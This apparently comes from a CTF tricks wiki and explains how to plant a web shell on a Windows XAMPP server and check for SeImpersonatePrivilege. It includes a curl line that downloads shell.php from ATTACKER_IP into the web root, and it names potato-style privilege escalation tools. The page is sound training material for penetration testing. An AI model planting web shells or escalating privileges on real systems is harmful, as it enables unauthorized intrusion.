> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-7/webshell/trick-0042.md).

# Web Shell to Gain SeImpersonatePrivilege

***

You might have an initial shell on a target system, but need the context of the web server process to check for specific privileges like `SeImpersonatePrivilege`. Use the existing shell to download a web shell (e.g., `shell.php` hosted on your attacker machine) to the web root directory (e.g., `C:\xampp\htdocs`). XAMPP is a popular free and open source cross-platform web server solution stack.

```bash
curl http://ATTACKER_IP/shell.php -o C:\xampp\htdocs\shell.php
```

Then, access the web shell via a browser or another `curl` command pointing to the target web server's address and port (e.g., `http://TARGET_IP:8080/shell.php`). This provides command execution within the web server's process context.

Once you have execution via the web shell, run `whoami /priv` to enumerate the privileges held by that process.

```powershell
whoami /priv
```

Look for `SeImpersonatePrivilege`, as its presence is a common indicator for potential Windows privilege escalation. This privilege allows a user to impersonate other users. If a process has this privilege enabled, it can impersonate any token, including elevated tokens, to perform actions as that user. This is particularly useful when the process is running as a service account (like `NT AUTHORITY\SYSTEM` or `NT AUTHORITY\SERVICE`) which often have this privilege enabled. A process that holds this user right can impersonate any authenticated user, including high-privilege accounts such as LocalSystem or administrators.

An example output showing the privilege enabled might look like this:

```
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= =======
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
...
```

The presence of `SeImpersonatePrivilege` allows for privilege escalation using tools that exploit this capability by impersonating a privileged user token. Common tools used to exploit `SeImpersonatePrivilege` or `SeAssignPrimaryToken` privileges include `PrintSpoofer`, `JuicyPotato`, `SweetPotato`, and `RoguePotato`.
